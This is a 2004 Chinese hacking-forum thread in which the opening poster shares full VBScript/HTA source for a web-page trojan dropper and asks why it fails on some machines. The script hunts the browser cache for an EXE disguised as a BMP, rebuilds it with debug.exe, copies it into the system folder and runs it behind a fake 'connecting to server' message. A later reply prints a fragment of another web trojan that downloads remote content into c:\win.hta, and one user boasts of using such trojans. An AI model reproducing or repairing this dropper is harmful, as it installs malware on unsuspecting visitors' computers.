|
 | 作者: zhwe [zhwe_it]
 论坛用户 |
登录 |
| aaa.asp文件代码如下 <% response.ContentType="application/hta" %> <SCRIPT LANGUAGE="VBScript"> 'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com Option Explicit window.moveto 0,0 window.resizeto 0,0 Dim FSO,WSH,CACHE,str,sucess Set FSO = CreateObject("Scripting.FileSystemObject") Set WSH = CreateObject("WScript.Shell") CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") sucess=0 sub FF SearchBMPFile fso.GetFolder(CACHE),"mir2[1].bmp" if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"mir2[2].bmp" End sub Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname'); if FSO.FileExists(str) then tmp=fso.GetSpecialFolder(2) & "\" winsys=fso.GetSpecialFolder(1) & "\" set File=FSO.GetFile(str) File.Copy(tmp & "tmp.dat") On Error Resume Next File.Delete if FSO.FileExists(str) then exit function set Lt=FSO.CreateTextFile(tmp & "tmp.in") Lt.WriteLine("rbx") Lt.WriteLine("1") Lt.WriteLine("rcx") '下面的数字是十六进制的EXE文件的大小 Lt.WriteLine("CB27") Lt.WriteLine("w136") Lt.WriteLine("q") Lt.Close set Lt=FSO.CreateTextFile(tmp & "tmp.bat") Lt.WriteLine("@echo off") Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "mir2.exe>" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out") Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out") Lt.WriteLine(winsys & "mir2.exe") Lt.Close WSH.Run tmp & "tmp.bat",false,6 On Error Resume Next 'FSO.GetFile(tmp & "tmp.bat").Delete sucess=1 window.open "hyjl.HTM","","width=0,height=0,top=1500,left=1500" window.close msgbox "好像好爽的感觉......" end if If Folder.SubFolders.Count <> 0 Then For Each SubFolder In Folder.SubFolders SearchBMPFile SubFolder,fname Next End If End Function </script> <SCRIPT language=JavaScript> function F() { FF(); if (sucess==0) setTimeout("F()", 2000); } setTimeout("F()", 2000); </SCRIPT> <body> 正在连接服务器....请不要关闭! </body> </html> 出错为: 当前页的脚本发生错误 行:11 字符:1 错误:ActiveX部件不能创建对象:‘WSscript.Shell' 代码:0 URL: 是否继续运行该页的脚本程序? |
| 地主 发表时间: 04-06-21 22:45 |
 | 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
'by 陈经韬 是不是做黑洞的那个? 代码好象不完整 但是这方面我懂的不多 所以不发表意见 |
| B1层 发表时间: 04-06-22 09:29 |
| 回复: zhwe [zhwe_it] 论坛用户 |
登录 |
|
完整的,,大多数电脑运行没有出错,达到了木的,但少量的计算机运行就出现以上错 |
| B2层 发表时间: 04-06-22 13:48 |
 | 回复: asmcc [asmcc]  论坛用户 |
登录 |
|
这是哪个文件的代码? |
| B3层 发表时间: 04-06-24 06:07 |
| 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
有的电脑出错误 有的电脑没有出 可能是因为有的电脑打补丁了 有的没有! 网页木马是根据IE漏洞做的! IE打了补丁 就没有用了! |
| B4层 发表时间: 04-06-24 11:13 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
大哥你难道看他象网页木马???????? |
| B5层 发表时间: 04-06-24 13:00 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
楼上的! 不像网页木马像什么呢? 我把上面的内容存成***.ASP 用IE浏览以后(IE打过补丁) 会提示下载***.hta 文件 并且瑞星报告有病毒! 诺顿没有什么反映!  |
| B6层 发表时间: 04-06-24 14:23 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
大哥 你应该弄清楚木马的定义 这个只是网页病毒而已 木马需要具备基本的远程控制能力 . |
| B7层 发表时间: 04-06-24 16:56 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
对了啊,提醒一下,应该注意些常识,如果是木马的话,反病毒软件提示你不应该是script.HTA.a了,那就应该是Troj.HTA.a了.!! 蠕虫则是Worm.***** [此贴被 cooke(cnpowers) 在 06月25日08时36分 编辑过] |
| B8层 发表时间: 04-06-25 08:36 |
 | 回复: zhangyun [zhangyun]  论坛用户 |
登录 |
|
领教......... |
| B9层 发表时间: 04-06-26 19:21 |
 | 回复: zhugang [zhugang] 论坛用户 |
登录 |
|
我虽然不计算机专业的啊但对这些东西很感兴趣啊但是不知道看那些书啊你可以告诉我吗? |
| B10层 发表时间: 04-06-27 18:54 |
 | 回复: Glassheart [qq200200] 论坛用户 |
登录 |
|
exe2bmp生成的木马。 不懂可以加我QQ。 MYQQ:200200 |
| B11层 发表时间: 04-06-27 22:03 |
 | 回复: cwenqiang [cwenqiang] 论坛用户 |
登录 |
|
看不懂这个啊!! |
| B12层 发表时间: 04-06-28 09:27 |
| 回复: lijingxi [lijingxi] 见习版主 |
登录 |
|
TO B8 呵呵!谁告诉你木马程序一定要具备远程控制功能! 远程发送密码程序难道不叫木马么!有一些木马会自动把密码发送到某电子邮件!难道这些不是木马 那你告诉我这叫什么? 上面提示的是SCRIPT 表示是脚本病毒! 这个木马就是利用教程生成木马!!!!! [quote]大哥 你应该弄清楚木马的定义 这个只是网页病毒而已 木马需要具备基本的远程控制能力 . [quote] 你应该弄清楚木马的定义!!!!!! |
| B13层 发表时间: 04-06-28 13:41 |
 | 回复: wangsong [wangsong] 论坛用户 |
登录 |
|
不管是网页木马还是病毒 不要跑题 |
| B14层 发表时间: 04-06-28 16:41 |
 | 回复: lgf [lgf] 论坛用户 |
登录 |
|
楼上的 什么意思! 不理解 |
| B15层 发表时间: 04-06-28 17:00 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
拜托老大,你~~~~ 没有话可说了, 你不想想如果他不在客户端运行,并且进行一定的操作,他怎么截取密码啊.这难道不算远程控制???? 受不了,还有啊 ,网页木马是利用系统或者IE的漏洞下载木马程序悄悄的在后台运行的,你仔细看以下,你见过后缀是hta的木马吗? |
| B16层 发表时间: 04-06-28 20:08 |
| 回复: superclass [superclass] 论坛用户 |
登录 |
|
晕 又吵了。 |
| B17层 发表时间: 04-06-29 10:17 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
呵呵 不是吵啊 辩论是不是啊.呵呵 败类你说是不? |
| B18层 发表时间: 04-06-29 10:38 |
| 回复: lincoln [lincoln] 论坛用户 |
登录 |
|
.HTA文件很可能是个木马, <script language="VBScript"> Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet=oReq.responseTEXT SaveFile HttpDoGet,"c:\win.hta" '在C:根目录下生成HTA文件 Set oReq=nothing End if End Function '保存文本文件,生成本地HTA。 这段代码是一个网页木马上的。如果你中了你就会知道它的厉害 我的瑞星是6月29日最新版的,根本就杀不出来。 |
| B19层 发表时间: 04-06-29 13:24 |
| 回复: cooke [cnpowers] 论坛用户 |
登录 |
|
注意:<script language="VBScript"> !!!!!!!!!!!!!!!!!!!!!!!!!! 病毒而已~~~~~ |
| B20层 发表时间: 04-06-29 22:25 |
| 回复: lihaonan [lihaonan] 论坛用户 |
登录 |
|
那个网液木马是最新不闪突破%90浏览器网页木马那个木马很好做,我只看了别人做了一边我就学了很简单的?我现在就用那个网页木马 |
| B21层 发表时间: 04-07-10 22:23 |
| 回复: www611124 [www611124] 论坛用户 |
登录 |
|
是不是你修改过改代码? |
| B22层 发表时间: 04-09-24 00:14 |
 | 回复: hcz [hcz] 论坛用户 |
登录 |
|
人家来问问题,你们跟贴在吵架。 |
| B23层 发表时间: 04-09-24 09:37 |
| 回复: bay [coming] 论坛用户 |
登录 |
个位大哥你看看............. 现在人家的杀毒软件把QQ解密的软件都列为病毒了......要分清啊.......... 不说了 楼下的不要说我啊! |
| B24层 发表时间: 04-09-25 14:36 |
 | 回复: sgofire [sgofire] 论坛用户 |
登录 |
|
靠这个脚本看不懂呀 |
| B25层 发表时间: 04-09-25 19:29 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 网页黑客级的人物来看看啊,